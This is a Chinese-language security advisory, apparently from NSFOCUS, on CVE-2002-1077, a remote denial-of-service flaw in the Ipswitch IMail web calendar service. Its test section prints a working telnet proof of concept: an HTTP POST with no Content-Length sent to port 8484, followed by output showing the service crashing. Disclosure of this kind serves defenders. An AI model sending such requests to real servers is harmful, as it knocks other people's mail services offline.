首页 -> 安全研究

安全研究

安全漏洞
IPSwitch IMail Web日志服务HTTP POST远程拒绝服务攻击漏洞

发布日期:2002-07-30
更新日期:2002-08-01

受影响系统:
Ipswitch IMail 7.1
Ipswitch IMail 7.0.7
Ipswitch IMail 7.0.6
Ipswitch IMail 7.0.5
Ipswitch IMail 7.0.4
Ipswitch IMail 7.0.3
Ipswitch IMail 7.0.2
Ipswitch IMail 7.0.1
Ipswitch IMail 6.4
Ipswitch IMail 6.3
Ipswitch IMail 6.2
Ipswitch IMail 6.1
Ipswitch IMail 6.0.6
Ipswitch IMail 6.0.5
Ipswitch IMail 6.0.4
Ipswitch IMail 6.0.3
Ipswitch IMail 6.0.2
Ipswitch IMail 6.0.1
Ipswitch IMail 6.0
Ipswitch IMail 5.0.8
Ipswitch IMail 5.0.7
Ipswitch IMail 5.0.6
Ipswitch IMail 5.0.5
Ipswitch IMail 5.0
描述:
CVE(CAN) ID: CVE-2002-1077

IMail是一款由Ipswitch公司开发和维护的商业电子邮件服务程序,IMail可使用在Microsoft Windows操作系统下,其中包含基于WEB的日历服务。

IMail的WEB的日历服务在处理HTTP POST请求时缺少正确的处理,远程攻击者可以利用这个漏洞进行拒绝服务攻击。

IMail的WEB的日历服务监听TCP 8484端口,攻击者可以提交不包含"Content-Length"长度的HTTP POST请求给IMail的WEB的日历服务,可导致iwebcal服务崩溃,产生拒绝服务攻击。

<*来源:2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-07/0399.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

2c79cbe14ac7d0b8472d3f129fa1df55@hushmail.com 提供了如下测试方法:

xxx@xx:~$ telnet 192.168.0.2 8484
Trying 192.168.0.2...
Connected to 192.168.0.2.
Escape character is '^]'.
POST / HTTP/1.0


Connection closed by foreign host.


[the iwebcal service has crashed]


xxx@xx:~$ telnet 192.168.0.2 8484
Trying 192.168.0.2...
telnet: connect to address 192.168.0.2: Connection refused

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时没有合适的临时解决方法。

厂商补丁:

Ipswitch
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.ipswitch.com/

浏览次数:3328
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障